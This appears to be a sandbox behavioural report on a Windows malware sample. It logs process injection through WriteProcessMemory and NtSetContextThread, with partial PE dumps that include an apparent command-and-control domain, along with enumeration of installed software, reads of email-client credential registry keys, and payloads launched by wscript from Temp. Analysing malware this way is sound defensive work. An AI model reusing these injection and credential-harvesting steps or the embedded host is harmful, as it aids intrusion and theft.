WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $G[¡:ÏÉ:ÏÉ:ÏÉXRÌÈ:ÏÉXRÊÈ¿:ÏÉXRÈÈ:ÏÉQOËÈ:ÏÉQOÌÈ:ÏÉQOÊÈS:ÏÉXRËÈ:ÏÉXRÉÈ:ÏÉXRÎÈ:ÏÉ:ÎÉð:ÏÉ[OÆÈ:ÏÉ[OÍÈ:ÏÉRich:ÏÉPELìraà¢@wøÀ@ @BÀüQÈÔ8Õ@À°.text ¢ `.rdataâÀ¦@@.dataT`F>@À.relocüQÀR@B base_address: 0x00400000 process_identifier: 2716 process_handle: 0x00000450	1	1
WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2716 process_handle: 0x00000450	1	1
WriteProcessMemory Sept. 6, 2021, 6:20 p.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à$¦°@@Ðà\CODE° `DATAl°@ÀBSSÅÀ¤À.idataÐ¤@À.reloc\à¬@PÄ@P base_address: 0x00400000 process_identifier: 1908 process_handle: 0x00000468	1	1
WriteProcessMemory Sept. 6, 2021, 6:20 p.m.	buffer: @2À@@@\@ì @l$@ËÌÈÉ×ÏÈÍÎÛØÚÙÊÜÝÞßàáãäå@ErrorÀRuntime error at 00000000À0123456789ABCDEFÿÿÿÿàO@ÀÀ@@J7<äºÏ¿}ªiFîµä[Jú-EÝ]³QçëqØ'ÓØ'ÓØ'ÖØ7nØ$ÓsØ$ÓsØ$nsØ7ÓsØ7ÖsØ$ÓØ7Ø7ÖØ7ÖsØ$ÓØ$nsØ$nsØ7Ø$ÓØ$nsØ$nsØ7ÖsØ$ÓsØÔØ'ØØsØXØ$ÓØ'ÖØqØ'ÖØáveÛe3ôs>v÷E±Yêá)VûAr5d2'òÂØMY pê5ù©ñÌ-þ+~R¶ÖæÐvMºoß3 v§·5vÅÞ¸`6©¤á þáx.¢Wï)b!ò²jíïz´Ì·\|X¸q/Õæ?dEzãîs£3Ãhp>4Æ7èËJ\|úðØèëá¾iAò¡úèÌ3áHþíG\rgã@À¥[\ë¸?áRÃénSÑÒ-´¼;ÐÍñ[MQ¶SEvr]`U¥Ýê(èúmü'~àÖ.ÚÅÂÅÃ3Â%G°j°Uî½S:Ì¦æä[½V¿vz½åÁL}¸<ÿ,9ÞýV_:Â9 ç½WùÙÔÛoSûËÛ`Qé6ñ¡àwËm¥Anm'o-°aÃÐµ1ä¨5[þ'Çè©Ð¦¿q¤ÞÆ +ºê$gÌ7¶G~Ø: ðDºÜÑk½´úÓæ`¸{ÈQÖÎ<Aæ>5²+X2`ÿ0e¢÷¼Aâ@PD%ÌÐÒ:¨»efk®Z¨ÃÌPÒÕcÕéN{»¨¤¦b«?O±óÝ0ZRÔèÌÚÃOË©¤×`TwR\ÀàÄËÃÐÃsS¦@O±j¹}¢ì Jg_ÍYÇò @'¸PÂZ°)zãp>cXgÇ¼\|½\ÏODná)ü7Lôû8a³Ô´:3ªÆôë¥øGgPnº1½·ÕÔ^)õ/2{Û¸<T¾i#©È7ný_Fû^înB!ôëäRÛc-dèmàÇ«>WÆÄNä¨«$há:_p$Öd^}QÏ kï8áeÏÌË%V¿âFNØ\ðøG;æ1Èy¤SÇ,°!#fñÄþ j®Þ Ø\|íälçÇ+ÆÚ EÅÅ$Ü¶Dë Í!kù,ú"dlQ(°ÇMIÎ,p#°)]ÕÙ9i-0àl&®ª!YÑoPÝ+¾9}\±¡©Ù.¿4#D.§×è¼R I±£ç 1ÔTû_v¿tÂmÿóJQ÷Ð\pk+Fæ_h:÷Ù æÄ £8 c+-û2_ö0ýcQò¸dtµ+ûÞ¸¦åð#t êqêR(PY» ïÀ(¢#ÓÏÆÌzÓ ¯N$ÇAÇAôÆApÇA¤ÆAÇA@ÇAhÇAlÆA,ÇA¼ÆAÇA°ÆAÆAÄÆA´°AÇAÇAÇA(ÈA\ÇAüÆA4ÇA\|ÆAÆAìÆA ÇA<ÇA¸°AèÆA¤ÇA°°AÀÆAÇA¸ÆAdÆA°ÇAðÆA ÇA´ÆA(ÇAÈÇAØ°A¼°AÆAÇAÇAÇAÆA ÆA8ÇA¬ÆAPÇA¬ÇAÆALÇAøÆAÌÆADÇA`ÇA¬°A ÈA¨ÇAÇAÇAÈÆAÆAÇAÆA0ÇAhÆAHÇA´ÇAmazoyer.ac.ug base_address: 0x0041b000 process_identifier: 1908 process_handle: 0x00000468	1	1
WriteProcessMemory Sept. 6, 2021, 6:20 p.m.	buffer: ,ÒÜÐ ÔHÑXÔXÑÔhÑàÔxÑÕÑ8ÕÑºÖðÑ*×Òp× Ò:ÒRÒjÒÒÒ¬Ò¼ÒÈÒÖÒæÒÓÓ$Ó:ÓPÓbÓtÓÓÓ®Ó¼ÓÊÓÖÓòÓþÓÔ,Ô>ÔLÔfÔzÔÔ¦Ô¶ÔÌÔîÔÕ Õ.ÕFÕRÕZÕfÕxÕÕÕ¦Õ¶ÕÆÕØÕìÕÖÖ.ÖBÖPÖ`ÖrÖ~ÖÖÖ®ÖÄÖÔÖäÖðÖ× ×6×B×V×^×z××kernel32.dllDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionVirtualFreeVirtualAllocLocalFreeLocalAllocGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdWideCharToMultiByteMultiByteToWideCharGetThreadLocaleGetStartupInfoAGetModuleFileNameAGetLocaleInfoAGetCommandLineAFreeLibraryExitProcessWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleuser32.dllGetKeyboardTypeMessageBoxACharNextAadvapi32.dllRegQueryValueExARegOpenKeyExARegCloseKeyoleaut32.dllSysFreeStringSysReAllocStringLenSysAllocStringLenkernel32.dllGetModuleHandleAadvapi32.dllRegOpenKeyExARegEnumKeyAFreeSidkernel32.dllWriteFileSleepLocalFreeLoadLibraryExWLoadLibraryAGlobalUnlockGlobalLockGetTickCountGetSystemInfoGetProcAddressGetModuleHandleAGetModuleFileNameAGetFileAttributesWGetCurrentProcessIdGetCurrentProcessFreeLibraryFindNextFileWFindFirstFileWFindCloseExitProcessDeleteFileWCreateDirectoryWCopyFileWgdi32.dllSelectObjectDeleteObjectDeleteDCCreateCompatibleDCCreateCompatibleBitmapBitBltuser32.dllReleaseDCGetSystemMetricsGetDCCharToOemBuffAole32.dllOleInitializeCoCreateInstance base_address: 0x0041d000 process_identifier: 1908 process_handle: 0x00000468	1	1
WriteProcessMemory Sept. 6, 2021, 6:20 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1908 process_handle: 0x00000468	1	1
WriteProcessMemory Sept. 6, 2021, 6:20 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $8±K¿\|Ð%ì\|Ð%ì\|Ð%ìï½ì}Ð%ì¦»ìdÐ%ì¦ìùÐ%ì¦ìOÐ%ìu¨¦ì~Ð%ìu¨¶ì{Ð%ì\|Ð$ìÐ%ì¦ìvÐ%ì¦¸ì}Ð%ìRich\|Ð%ìPELÎ^à 0âz@@@D¨Pôh@@.text.0 `.rdatalq@r4@@.data¨CÀ¦@À.reloc0+,¸@B base_address: 0x00400000 process_identifier: 3324 process_handle: 0x00000460	1	1
WriteProcessMemory Sept. 6, 2021, 6:20 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3324 process_handle: 0x00000460	1	1

Code injection by writing an executable or DLL to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $G[¡:ÏÉ:ÏÉ:ÏÉXRÌÈ:ÏÉXRÊÈ¿:ÏÉXRÈÈ:ÏÉQOËÈ:ÏÉQOÌÈ:ÏÉQOÊÈS:ÏÉXRËÈ:ÏÉXRÉÈ:ÏÉXRÎÈ:ÏÉ:ÎÉð:ÏÉ[OÆÈ:ÏÉ[OÍÈ:ÏÉRich:ÏÉPELìraà¢@wøÀ@ @BÀüQÈÔ8Õ@À°.text ¢ `.rdataâÀ¦@@.dataT`F>@À.relocüQÀR@B base_address: 0x00400000 process_identifier: 2716 process_handle: 0x00000450	1	1
WriteProcessMemory Sept. 6, 2021, 6:20 p.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à$¦°@@Ðà\CODE° `DATAl°@ÀBSSÅÀ¤À.idataÐ¤@À.reloc\à¬@PÄ@P base_address: 0x00400000 process_identifier: 1908 process_handle: 0x00000468	1	1
WriteProcessMemory Sept. 6, 2021, 6:20 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $8±K¿\|Ð%ì\|Ð%ì\|Ð%ìï½ì}Ð%ì¦»ìdÐ%ì¦ìùÐ%ì¦ìOÐ%ìu¨¦ì~Ð%ìu¨¶ì{Ð%ì\|Ð$ìÐ%ì¦ìvÐ%ì¦¸ì}Ð%ìRich\|Ð%ìPELÎ^à 0âz@@@D¨Pôh@@.text.0 `.rdatalq@r4@@.data¨CÀ¦@À.reloc0+,¸@B base_address: 0x00400000 process_identifier: 3324 process_handle: 0x00000460	1	1

Collects information about installed applications (50 out of 54 events)

Time & API	Arguments	Status
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000540 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000360 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000368 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x000003c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x000003c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x000003d0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x000003e8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x000003f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x000003f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000404 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000414 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x0000041c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000424 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x0000042c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000434 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x0000043c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000444 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x0000044c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Sept. 6, 2021, 6:20 p.m.	key_handle: 0x00000454 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1

Harvests credentials from local email clients (4 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook

Network activity contains more than one unique useragent (2 events)

process	Oggnfkemtibcinconsoleapp16.exe				useragent	Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
process	Hsbvhggsqlrfmuvyptooonsoleapp5.exe				useragent

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2768 called NtSetContextThread to modify thread in remote process 2716
Process injection	Process 2072 called NtSetContextThread to modify thread in remote process 1908
Process injection	Process 2552 called NtSetContextThread to modify thread in remote process 3324
NtSetContextThread Sept. 6, 2021, 6:19 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4454519 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002b0 process_identifier: 2716	1	0	0
NtSetContextThread Sept. 6, 2021, 6:20 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4302468 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003a8 process_identifier: 1908	1	0	0
NtSetContextThread Sept. 6, 2021, 6:20 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4291211 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000488 process_identifier: 3324	1	0	0

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
parent_process	wscript.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe"
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
parent_process	wscript.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe"
